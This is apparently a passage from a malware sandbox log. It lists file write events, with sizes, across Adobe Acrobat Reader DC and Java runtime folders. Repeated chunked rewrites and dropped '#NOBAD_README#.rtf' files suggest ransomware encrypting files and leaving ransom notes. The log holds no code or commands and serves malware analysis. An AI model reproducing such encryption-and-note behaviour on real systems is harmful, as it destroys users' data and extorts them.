| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-gb\ui-strings.js | size = 8271 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\plugin.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\plugin.js | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ja-jp\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ja-jp\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon.png | size = 1804 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sl-si\ui-strings.js | size = 9182 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\uk-ua\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\uk-ua\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\compare_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\compare_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\eBook.api | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\eBook.api | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\redact_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\redact_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\javaw.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\javaw.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\policytool.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\policytool.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\accessibility.properties | size = 1565 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\2d.x3d | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\2d.x3d | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\2d.x3d | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-il\ui-strings.js | size = 8633 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\content-types.properties | size = 6964 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\eula.ini | size = 2456 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\main-selector.css | size = 2218 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\add_reviewer.gif | size = 2754 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ko-kr\ui-strings.js | size = 9583 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sv-se\ui-strings.js | size = 8983 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_sv.properties | size = 4825 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\main.css | size = 9527 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\new_icons_retina.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\new_icons_retina.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_received.gif | size = 2031 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\#NOBAD_README#.rtf | size = 8677 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_super.gif | size = 2230 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\bg_patterns_header.png | size = 2119 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ca-es\ui-strings.js | size = 3347 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\cldrdata.jar | size = 17800 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\cldrdata.jar | size = 61440 |
|
4 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\cldrdata.jar | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\submission_history.gif | size = 2322 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\ui-strings.js | size = 3275 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-ma\ui-strings.js | size = 3280 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\LightTheme.acrotheme | size = 8336 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-fr\ui-strings.js | size = 3280 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Updater.api | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Updater.api | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Updater.api | size = 172 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-high-contrast.css | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-high-contrast.css | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-144x144-precomposed.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-144x144-precomposed.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\end_review.gif | size = 2316 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\ui-strings.js | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_joined.gif | size = 2330 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_ok.gif | size = 1641 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\warning.gif | size = 1785 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ro-ro\ui-strings.js | size = 3308 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\ui-strings.js | size = 3148 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon_hover_2x.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon_hover_2x.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon_hover_2x.png | size = 1968 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_hiContrast_bow.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_hiContrast_bow.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pt-br\ui-strings.js | size = 3230 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\ui-strings.js | size = 3143 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon_hover.png | size = 1804 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaSansRegular.ttf | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaSansRegular.ttf | size = 61440 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaSansRegular.ttf | size = 8192 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_MoveDrop32x32.gif | size = 1563 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\ui-strings.js | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-win8.css | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-win8.css | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adobe_spinner_mini.gif | size = 1719 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\dd_arrow_small.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\dd_arrow_small.png | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\large_trefoil.png | size = 3436 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\selection-actions.png | size = 3139 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\#NOBAD_README#.rtf | size = 8677 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\dd_arrow_small.png | size = 2515 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons_retina_thumb.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons_retina_thumb.png | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jvm.hprof.txt | size = 5642 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\psfont.properties.ja | size = 4212 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ind_prog.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ind_prog.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\local_policy.jar | size = 4943 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\ui-strings.js | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\exportpdf-rna-selector.js | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\exportpdf-rna-selector.js | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon.png | size = 1861 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\RHP_icons.png | size = 2425 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adobe_spinner_mini.gif | size = 1719 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\ui-strings.js | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\Welcome.html | size = 2371 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\ui-strings.js | size = 2549 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\dd_arrow_small.png | size = 2515 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-ma\ui-strings.js | size = 2568 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\plugin.js | size = 4311 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_hover.png | size = 1804 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\da-dk\ui-strings.js | size = 2552 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hu-hu\ui-strings.js | size = 2570 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ro-ro\ui-strings.js | size = 2584 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Certificates_R.aapp | size = 2105 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\EPDF_Full.aapp | size = 1805 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\ui-strings.js | size = 2616 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Scan_R_RHP.aapp | size = 1873 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\root\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\root\ui-strings.js | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\combinepdf-selector.js | size = 4966 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\example_icons.png | size = 2538 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_hover.png | size = 1804 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\da-dk\ui-strings.js | size = 2640 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\example_icons.png | size = 2099 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hu-hu\ui-strings.js | size = 2668 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-ae\ui-strings.js | size = 2616 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ru-ru\ui-strings.js | size = 2788 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\exportpdf-rna-tool-view.js | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\exportpdf-rna-tool-view.js | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ja-jp\ui-strings.js | size = 2691 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_2x.png | size = 2027 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\ui-strings.js | size = 2555 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hr-hr\ui-strings.js | size = 2554 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\ui-strings.js | size = 2531 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-si\ui-strings.js | size = 2650 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugin.js | size = 2337 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_hover_2x.png | size = 1968 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\createpdfupsell-app-selector.js | size = 5378 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-gb\ui-strings.js | size = 2239 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\de-de\ui-strings.js | size = 2682 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\it-it\ui-strings.js | size = 2659 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ja-jp\ui-strings.js | size = 2849 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sl-si\ui-strings.js | size = 2772 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\main.css | size = 5532 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\js\plugin.js | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\js\plugin.js | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\es-es\ui-strings.js | size = 2780 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sk-sk\ui-strings.js | size = 2682 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\da-dk\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\da-dk\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\createpdfupsell-app-tool-view.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\createpdfupsell-app-tool-view.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nb-no\ui-strings.js | size = 2747 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-il\ui-strings.js | size = 2733 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\tr-tr\ui-strings.js | size = 2761 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ko-kr\ui-strings.js | size = 2799 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\selector.js | size = 5190 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\ui-strings.js | size = 2765 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\plugin.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\plugin.js | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-ae\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-ae\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\de-de\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\de-de\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\css\main.css | size = 5958 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\rhp_world_icon_2x.png | size = 1968 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\es-es\ui-strings.js | size = 2729 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nb-no\ui-strings.js | size = 2702 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\tr-tr\ui-strings.js | size = 2742 |
|
1 | |
